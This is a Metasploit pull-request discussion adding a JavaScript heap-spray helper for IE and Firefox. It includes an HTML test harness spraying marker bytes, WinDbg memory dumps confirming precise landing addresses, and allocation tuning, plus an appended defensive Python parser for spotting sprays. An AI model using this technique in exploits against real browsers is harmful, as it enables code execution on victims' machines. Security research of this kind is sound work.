Adds new function js_property_spray #1531

Merged
merged 13 commits into from Feb 28, 2013

wchen-r7 commented Feb 28, 2013

This heap spray technique takes advantage of MSHTML's SetStringProperty (or SetProperty) function to trigger allocations by ntdll!RtlAllocateHeap. It is based on Corelan's publication on "DEPS – Precise Heap Spray on Firefox and IE10".

It has been tested on IE 8, 9, and 10. Also on Firefox.

Here's a very basic example on how to test the new function:

def load_exploit_html(cli, req)
    # js_property_spray is the helper added in this PR; it returns the
    # JavaScript that defines sprayHeap()
    spray = js_property_spray

    html = %Q|
    <html>
    <head></head>
    <body>
    <script>
    #{spray}

    // marker bytes AAAABBBBCCCCDDDDEEEEFFFFGGGG, easy to recognise in a debugger
    var s = unescape("%u4141%u4141%u4242%u4242%u4343%u4343%u4444%u4444%u4545%u4545%u4646%u4646%u4747%u4747");
    sprayHeap({shellcode:s});
    alert("done");
    </script>
    </body>
    </html>
    |

    return html
end
jlee-r7 commented Feb 28, 2013

It would be nice for the documentation to mention where your shellcode ends up in memory.

corelanc0d3r commented Feb 28, 2013

0x20302228 on IE and 0x20302210 on Firefox
(provided that these addresses are not taken by a module that belongs to the app you're targeting)
For regular browser environments these addresses are reliable.

wchen-r7 commented Feb 28, 2013

jlee-r7, we have second thoughts about that because you can say the shellcode is landing at address X, but if your dev env is loaded with random junk, modules could occupy that particular memory address. If that's the case, those who lack understanding of how spraying works can just blame us for their own problems. In my opinion, they should be able to find it themselves.

I actually have a blog on the way that will mention where you'll see your code in memory.

jvazquez-r7 commented Feb 28, 2013

Awesome work! Congratulations! Sharing my test results:

  • IE 9 / Win 7 SP1:
0:023> db 0x20302228
20302228  41 41 41 41 42 42 42 42-43 43 43 43 44 44 44 44  AAAABBBBCCCCDDDD
20302238  45 45 45 45 46 46 46 46-47 47 47 47 20 20 20 20  EEEEFFFFGGGG    
20302248  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302258  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302268  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302278  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302288  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302298  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
  • IE10 / Win7 SP1: With IE10 it isn't super stable:

Sometimes the shellcode isn't in the expected address:

0:027> db 0x20302228
20302228  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
20302238  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
20302248  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
20302258  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
20302268  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
20302278  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
20302288  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
20302298  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
0:027> lmv m iexplore
start    end        module name
00110000 001cc000   iexplore   (deferred)             
    Image path: C:\Program Files\Internet Explorer\iexplore.exe
    Image name: iexplore.exe
    Timestamp:        Sun Feb 17 07:18:00 2013 (51207618)
    CheckSum:         000C0D20
    ImageSize:        000BC000
    File version:     10.0.9200.16521
    Product version:  10.0.9200.16521
    File flags:       0 (Mask 3F)
    File OS:          40004 NT Win32
    File type:        1.0 App
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Microsoft Corporation
    ProductName:      Windows® Internet Explorer
    InternalName:     iexplore
    OriginalFilename: IEXPLORE.EXE
    ProductVersion:   10.00.9200.16521
    FileVersion:      10.00.9200.16521 (win8_gdr_soc_ie.130216-2100)
    FileDescription:  Internet Explorer
    LegalCopyright:   © Microsoft Corporation. All rights reserved.

Sometimes it's near the expected address:

0:025> db 0x20302228
20302228  45 45 45 45 46 46 46 46-47 47 47 47 20 20 20 20  EEEEFFFFGGGG    
20302238  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302248  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302258  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302268  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302278  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302288  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302298  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20       

And other times the shellcode is at the expected address:

0:026> db 0x20302228
20302228  41 41 41 41 42 42 42 42-43 43 43 43 44 44 44 44  AAAABBBBCCCCDDDD
20302238  45 45 45 45 46 46 46 46-47 47 47 47 20 20 20 20  EEEEFFFFGGGG    
20302248  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302258  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302268  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302278  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302288  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302298  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20     

After increasing maxAllocs it seems to work better:

sprayHeap({shellcode:s, maxAllocs:0x500});
0:025> db 0x20302228
20302228  41 41 41 41 42 42 42 42-43 43 43 43 44 44 44 44  AAAABBBBCCCCDDDD
20302238  45 45 45 45 46 46 46 46-47 47 47 47 20 20 20 20  EEEEFFFFGGGG    
20302248  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302258  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302268  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302278  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302288  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302298  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20     
  • FF 19 / Win7 SP1: working as expected
0:036> db 0x20302210
20302210  41 41 41 41 42 42 42 42-43 43 43 43 44 44 44 44  AAAABBBBCCCCDDDD
20302220  45 45 45 45 46 46 46 46-47 47 47 47 20 20 20 20  EEEEFFFFGGGG    
20302230  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302240  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302250  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302260  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302270  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  
20302280  20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20                  

The @wchen-r7 explanation about the landing address topic makes sense. On the other hand, it would be nice to update the comment with a link to the blog post once it's written.

Checking with @wchen-r7 about the IE10 case and merging once he agrees.

wchen-r7 commented Feb 28, 2013

Juan -- yeah, that behavior for IE 10 is actually expected. When I was testing with Peter, he told me that anything below 0x350 times, the success rate seems to drop. So we decided to set it to 0x350 as default. Based on your results, maybe that value needs to be a bit higher. I think what I can do is mention this in the blog, that way people can be aware of that.

jvazquez-r7 commented Feb 28, 2013

Awesome, makes sense! Merging!

jvazquez-r7 merged commit 18c0bb0 into rapid7:master Feb 28, 2013

1 check passed: The Travis build passed
corelanc0d3r commented Mar 1, 2013

Yeah, in fact I had it set to 0x500 in my original scripts (for IE10).

Hotoon commented Dec 9, 2013

I used the first script published in "DEPS – Precise Heap Spray on Firefox and IE10". After debugging the heap using !heap -stat -h, I got confused because the output shows 500 iterations of a heap block size of 7ff52 (I used the same default value 0x80000):

0:011> !heap -stat -h
Allocations statistics for
heap @ 002d0000
group-by: TOTSIZE max-display: 20
size #blocks total ( %) (percent of total busy bytes)
7ff52 500 - 27fc9a00 (99.79)

Moreover, after I dumped the memory I encountered a heap corruption, as illustrated below:

0:011> !heap -flt s 0x7ff52
_HEAP @ 2d0000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
invalid allocation size, possible heap corruption
03b40018 ffea 0000 [00] 03b40020 7ff52 - (busy VirtualAlloc)
invalid allocation size, possible heap corruption
03d40018 ffea ffea [00] 03d40020 7ff52 - (busy VirtualAlloc)
invalid allocation size, possible heap corruption
04ab0018 ffea ffea [00] 04ab0020 7ff52 - (busy VirtualAlloc)

Why is it not showing the same output as your experiment in "New Heap Spray Technique for Metasploit Browser Exploitation"?
I'm using a VM with Win 7 SP1 and IE 10.
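The checks done by hand in this thread (jvazquez-r7 reading `db` at the landing address, Hotoon reading `!heap -stat -h`) can be made repeatable for crash triage. The following is an added Python example, not code from this PR or from Metasploit: it parses constructed samples modelled on the quoted WinDbg output, flags a block size that dominates the heap as a spray indicator, and reports whether the marker bytes are actually mapped at the expected address. Function names, thresholds and the sample text are assumptions.

```python
import re

# Constructed samples modelled on the WinDbg output quoted in this thread (not
# a real capture): a "!heap -stat -h" summary and a "db" dump at the IE landing
# address, plus one unmapped ("??") line.
HEAP_STAT_SAMPLE = """\
 heap @ 002d0000
group-by: TOTSIZE max-display: 20
    size     #blocks     total     ( %) (percent of total busy bytes)
    7ff52 500 - 27fc9a00  (99.79)
    1000 3 - 3000  (0.01)
"""
DB_SAMPLE = """\
0:026> db 0x20302228
20302228  41 41 41 41 42 42 42 42-43 43 43 43 44 44 44 44  AAAABBBBCCCCDDDD
20302238  45 45 45 45 46 46 46 46-47 47 47 47 20 20 20 20  EEEEFFFFGGGG
20302248  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
"""
# Every numeric column of "!heap -stat -h" is hex, #blocks included.
STAT_LINE = re.compile(r"^\s*([0-9a-f]+)\s+([0-9a-f]+)\s+-\s+([0-9a-f]+)\s+\(\s*([\d.]+)\)")
DB_LINE = re.compile(r"^([0-9a-f]{8})\s+((?:[0-9a-f?]{2}[ -]){15}[0-9a-f?]{2})")

def parse_heap_stat(text):
    """Return (size, blocks, total, percent) tuples from !heap -stat -h output."""
    rows = []
    for line in text.splitlines():
        m = STAT_LINE.match(line)
        if m:
            rows.append((int(m[1], 16), int(m[2], 16), int(m[3], 16), float(m[4])))
    return rows

def spray_indicators(rows, min_blocks=0x100, min_percent=90.0):
    """Many blocks of one size dominating busy bytes; size*blocks==total needs hex #blocks."""
    return [r for r in rows
            if r[1] >= min_blocks and r[3] >= min_percent and r[0] * r[1] == r[2]]

def parse_db(text):
    """Map address -> byte from "db" output; unmapped "??" cells map to None."""
    mem = {}
    for line in text.splitlines():
        m = DB_LINE.match(line)
        if m:
            base = int(m[1], 16)
            for i, cell in enumerate(re.split(r"[ -]", m[2])):
                mem[base + i] = None if cell == "??" else int(cell, 16)
    return mem

def marker_at(mem, addr, marker):
    """True when every marker byte is mapped and matches, starting at addr."""
    return all(mem.get(addr + i) == b for i, b in enumerate(marker))
```

Note that `!heap -stat -h` prints #blocks in hex, so the 500 in the quoted output is 0x500 (1280 blocks), which is why 0x7ff52 * 0x500 equals the 27fc9a00 total column exactly.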

corelanc0d3r commented Dec 10, 2013

The implementation in the Metasploit Framework is an optimized version of the script on www.corelan.be. Can you please try the Metasploit version and compare the output with the "New Heap Spray Technique for Metasploit Browser Exploitation" post?
